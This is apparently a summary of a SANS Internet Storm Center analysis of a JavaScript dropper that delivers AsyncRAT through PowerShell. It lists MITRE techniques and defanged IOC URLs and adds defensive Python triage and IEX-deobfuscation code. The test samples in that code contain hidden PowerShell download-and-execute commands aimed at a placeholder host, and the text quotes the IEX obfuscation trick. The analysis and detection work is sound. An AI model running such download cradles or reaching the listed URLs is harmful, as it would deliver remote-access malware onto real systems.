From JavaScript to AsyncRAT – SANS Internet Storm Center

A heavily obfuscated JavaScript dropper named "_Rechnung_01941085434_PDF.js" uses a UTF-16 BOM, large blocks of unused code, and embedded Base64 to conceal its payloads. It then launches a multi-stage PowerShell chain that downloads and executes remote payloads, culminating in a .NET assembly that implements AsyncRAT and is loaded in memory. #AsyncRAT #PowerShell #IEX #Rechnung_01941085434_PDF_js

Keypoints

  • The dropper starts with a Byte Order Mark (BOM) that signals big-endian UTF-16 encoding; read as raw bytes, every keyword is NUL-interleaved, which defeats naive string-based static analysis.
  • It contains vast blocks of unused text and Base64-encoded data hidden inside decoy variables to bury the real payload.
  • Once the encoding is normalized, the script can be run in SpiderMonkey to reveal the next stage, which allows further debugging of the dropper.
  • A PowerShell-based chain executes a payload through IEX, obfuscated as "$([char](9992-9887)+'ex')": 9992-9887 is 105, the character code of "i", so the sub-expression evaluates to "iex".
  • The chain fetches additional payloads from remote servers (PHP endpoints on throwaway .top domains) and loads a .NET assembly into memory for execution, a fileless, memory-resident approach.
  • The final payload, AsyncRAT, is downloaded and loaded in memory, ending a multi-stage delivery chain that hands the attacker a remote-access (C2) foothold.
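The first two key points describe two static-analysis hurdles: the UTF-16 BOM and the Base64 blobs parked in decoy variables. The Python triage helper below is an added example, not code from the ISC diary or its author; it handles both hurdles on a constructed sample. The sample script, its variable names, the embedded PowerShell command and the example.invalid URL are all made up for the demonstration.

```python
"""Static triage of a BOM-prefixed JavaScript dropper with Base64 stuffed into
decoy variables. Added example, not the ISC diary's code; the sample script,
its variable names and the example.invalid URL are constructed."""
import base64
import binascii
import re

# Byte-order marks and the codec to use once the mark is stripped. UTF-32 marks
# (FF FE 00 00 / 00 00 FE FF) are deliberately left out; add them if needed.
BOMS = {
    b"\xef\xbb\xbf": "utf-8",
    b"\xfe\xff": "utf-16-be",
    b"\xff\xfe": "utf-16-le",
}

def decode_script(raw: bytes) -> tuple[str, str]:
    """Return (codec, decoded text). Read as raw bytes, a UTF-16 file is
    NUL-interleaved ('v\\x00a\\x00r\\x00'), so grep-style keyword matching and
    YARA 'ascii' strings miss everything in it."""
    for bom in sorted(BOMS, key=len, reverse=True):  # longest mark first
        if raw.startswith(bom):
            codec = BOMS[bom]
            return codec, raw[len(bom):].decode(codec)
    return "utf-8", raw.decode("utf-8", errors="replace")

# A JS string literal assigned to a variable, at least 40 Base64 characters long.
B64_ASSIGN = re.compile(
    r"""(?:var|let|const)\s+(\w+)\s*=\s*["']([A-Za-z0-9+/]{40,}={0,2})["']"""
)

def extract_base64_vars(text: str) -> dict[str, bytes]:
    """Map variable name -> decoded bytes for every assignment whose value is
    valid Base64. Decoy variables holding prose fail the regex or validation."""
    found = {}
    for name, value in B64_ASSIGN.findall(text):
        try:
            found[name] = base64.b64decode(value, validate=True)
        except binascii.Error:
            continue
    return found

def looks_like_text(blob: bytes) -> bool:
    """True when a decoded blob is mostly printable: a script stage rather than
    an embedded binary or a random filler blob."""
    if not blob:
        return False
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in blob)
    return printable / len(blob) > 0.95

def triage(raw: bytes) -> tuple[str, dict[str, dict]]:
    """Decode, pull out Base64 variables and classify each one."""
    codec, text = decode_script(raw)
    report = {}
    for name, blob in extract_base64_vars(text).items():
        report[name] = {
            "size": len(blob),
            "text": looks_like_text(blob),
            "preview": blob[:48].decode("latin-1"),
        }
    return codec, report

# Constructed sample (not the real dropper): German invoice prose as filler,
# a PowerShell stage in one variable, random bytes in another.
STAGE2 = (b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
          b".DownloadString('http://example.invalid/1.php')\"")
FILLER = "Sehr geehrte Damen und Herren, anbei die Rechnung. " * 4
RANDOM = bytes(range(0, 256, 3))
SAMPLE_JS = (
    f'var lJ7x = "{FILLER}";\n'
    f'var z9Qa = "{base64.b64encode(STAGE2).decode()}";\n'
    f'var Hh2k = "{base64.b64encode(RANDOM).decode()}";\n'
    "eval(atob(z9Qa));\n"
)
SAMPLE_BYTES = b"\xfe\xff" + SAMPLE_JS.encode("utf-16-be")

if __name__ == "__main__":
    codec, report = triage(SAMPLE_BYTES)
    print(f"encoding: {codec}")
    for name, info in report.items():
        kind = "text" if info["text"] else "binary"
        print(f"{name}: {info['size']} bytes, {kind}: {info['preview']!r}")
```

Run it on the real file by replacing SAMPLE_BYTES with the dropper's bytes; the point is that the BOM check has to happen before any string matching, and that Base64 validation plus a printable-ratio check separates the one variable that holds a script stage from the filler around it.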

MITRE Techniques

  • [T1027] Obfuscated/Compressed Files and Information – The dropper uses a UTF-16 BOM and massive unused code to conceal the real payload. Quote: "The file uses BOM (Byte Order Mark) to indicate that the file is encoded in big-endian UTF-16."
  • [T1059.001] PowerShell – The payload is executed via PowerShell, including an IEX-based obfuscated stage. Quote: "A PowerShell payload will be executed. You can see the classic IEX obfuscated as "$([char](9992-9887)+'ex')"."
  • [T1105] Ingress Tool Transfer – The malware downloads multiple payloads from remote servers for execution. Quote: "The payload is downloaded from: hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1"
  • [T1071.001] Web Protocols – Every stage is retrieved over HTTP or HTTPS: the early stages over plain HTTP from attacker-controlled .top domains, the final executable over HTTPS from a public temporary file host (temp.sh). Quote: "The payload is downloaded from: hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?…"
  • [T1518.001] Security Software Discovery – An anti-analysis check queries the Windows Defender status through the Get-MpComputerStatus cmdlet; in the author's lab the call failed. Quote: "Get-MpComputerStatus()[3]. This cmdlet will return the status of the AV but it failed…"
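The IEX obfuscation quoted under T1059.001 (and in the key points above) is cheap to undo mechanically, which is what a detection should do rather than match the literal string "iex". The Python detector below is an added example, not the diary's code; it goes slightly beyond the single quoted expression by folding any [char] integer arithmetic (+, -, *) and any number of concatenated string pieces before looking for Invoke-Expression. The command lines it scans are constructed in the style of PowerShell command lines and are not captured from the sample; example.invalid is a placeholder host.

```python
"""Undo the [char]-arithmetic + concatenation trick used to hide IEX and flag
commands that reach Invoke-Expression. Added example, not the diary's code; the
command lines below are constructed and do not come from the sample."""
import ast
import operator
import re

# Only integer + - * are evaluated; names, calls, ** and everything else are
# refused, so untrusted script text can never reach eval().
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

def eval_arith(expr: str) -> int:
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        raise ValueError(f"unsupported expression: {expr!r}")
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as exc:
        raise ValueError(f"not arithmetic: {expr!r}") from exc
    return walk(tree.body)

# [char](9992-9887) or [char]105  ->  a single-quoted one-character literal
CHAR_CALL = re.compile(r"\[char\]\s*(?:\(([^()]+)\)|(\d+))", re.IGNORECASE)
# 'abc' + 'def' -> 'abcdef'; an embedded single quote is doubled in PowerShell
CONCAT = re.compile(r"'((?:[^']|'')*)'\s*\+\s*'((?:[^']|'')*)'")
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)

def _char_literal(m) -> str:
    try:
        ch = chr(eval_arith(m.group(1) or m.group(2)))
    except ValueError:          # not plain arithmetic: leave it untouched
        return m.group(0)
    return "'" + ("''" if ch == "'" else ch) + "'"

def normalize(command: str) -> str:
    """Fold [char] arithmetic and string concatenation so the command reads
    the way PowerShell will execute it."""
    text = CHAR_CALL.sub(_char_literal, command)
    while True:
        folded = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if folded == text:
            return folded
        text = folded

def invokes_expression(command: str) -> bool:
    return IEX.search(normalize(command)) is not None

def scan(lines: list[str]) -> list[int]:
    """Indices of lines whose normalized command reaches Invoke-Expression."""
    return [i for i, line in enumerate(lines) if invokes_expression(line)]

# Constructed command lines (not captured from the sample). Only the first three
# should be flagged; 'in'+'dex' in the last one folds to 'index', not iex.
SAMPLE_LOGS = [
    "powershell -nop -w hidden -c \"$([char](9992-9887)+'ex') "
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/1.php')\"",
    "powershell -c \"$([char](73)+[char](69)+[char](88)) $payload\"",
    "powershell -c \"Invoke-Expression (Get-Content .\\stage.ps1 -Raw)\"",
    "powershell -c \"Get-MpComputerStatus | Select-Object AntivirusEnabled\"",
    "powershell -c \"$x = 'in'+'dex'; Write-Host $x\"",
]

if __name__ == "__main__":
    flagged = scan(SAMPLE_LOGS)
    for i, line in enumerate(SAMPLE_LOGS):
        print("IEX " if i in flagged else "ok  ", normalize(line))
```

The arithmetic is evaluated through a whitelisted AST walk rather than eval() because the input is attacker-controlled script text; anything other than integer + - * is left as-is instead of being executed. Feed the normalized form, not the raw line, to whatever rule engine you use, and expect more folding steps (format operators, -join, Base64 -EncodedCommand) for other families.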

Indicators of Compromise

  • [URL] First-stage drop URL – oiutvh4f[.]top/1.php?s=mints1
  • [URL] Secondary payload URL – gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1 (the id= value is the name of the analysis host, so match on the domain and path rather than the full query string)
  • [URL] Final payload download – hxxps://temp[.]sh/bfseS/ruzxs.exe
  • [File] Dropper name – _Rechnung_01941085434_PDF.js
  • [Malware] AsyncRAT as the final payload family

Read more: https://isc.sans.edu/diary/rss/30788